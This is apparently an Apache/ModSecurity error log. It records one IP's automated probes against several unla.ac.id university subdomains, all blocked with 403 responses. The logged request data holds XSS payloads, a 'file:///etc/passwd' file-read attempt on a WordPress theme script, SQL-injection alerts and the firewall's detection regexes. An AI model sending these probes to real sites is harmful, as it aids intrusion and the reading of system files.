[Tue Aug 29 11:48:18.352962 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAkoTiQAAAAH"]
[Tue Aug 29 11:48:18.374874 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14ksCo-f0AAAkdu90AAAAO"]
[Tue Aug 29 11:48:18.412261 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAkoTicAAAAH"]
[Tue Aug 29 11:48:18.461339 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAkAMFIAAAAU"]
[Tue Aug 29 11:48:18.480035 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAfWN74AAAAL"]
[Tue Aug 29 11:48:18.503682 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAj12DwAAAAa"]
[Tue Aug 29 11:48:19.502501 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14k8Co-f0AAAknEGMAAAAB"]
[Tue Aug 29 11:48:21.381489 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAjYrD4AAAAK"]
[Tue Aug 29 11:48:21.386882 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAjM7KwAAAAT"]
[Tue Aug 29 11:48:21.498164 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz6gAAAAC"]
[Tue Aug 29 11:48:21.518698 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAkrz6kAAAAC"]
[Tue Aug 29 11:48:21.536784 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjM7LMAAAAT"]
[Tue Aug 29 11:48:21.539882 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjYrEQAAAAK"]
[Tue Aug 29 11:48:21.557522 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz6sAAAAC"]
[Tue Aug 29 11:48:21.561229 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjYrEUAAAAK"]
[Tue Aug 29 11:48:21.605370 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjM7LYAAAAT"]
[Tue Aug 29 11:48:21.623837 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz64AAAAC"]
[Tue Aug 29 11:48:21.644416 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjM7LgAAAAT"]
[Tue Aug 29 11:48:21.686608 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjM7LoAAAAT"]
[Tue Aug 29 11:48:21.706620 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjM7LsAAAAT"]
[Tue Aug 29 11:48:21.714968 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjtc@IAAAAX"]
[Tue Aug 29 11:48:21.721081 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjYrE0AAAAK"]
[Tue Aug 29 11:48:22.371369 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkdu@AAAAAO"]
[Tue Aug 29 11:48:22.388677 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkrz7QAAAAC"]
[Tue Aug 29 11:48:22.391509 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAjM7L0AAAAT"]
[Tue Aug 29 11:48:22.414564 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkdu@IAAAAO"]
[Tue Aug 29 11:48:22.434480 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAjYrFEAAAAK"]
[Tue Aug 29 11:48:22.448312 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lsCo-f0AAAkleyMAAAAD"]
[Tue Aug 29 11:48:22.494396 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lsCo-f0AAAkrz7kAAAAC"]
[Tue Aug 29 11:48:23.351266 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14l8Co-f0AAAjYrFQAAAAK"]
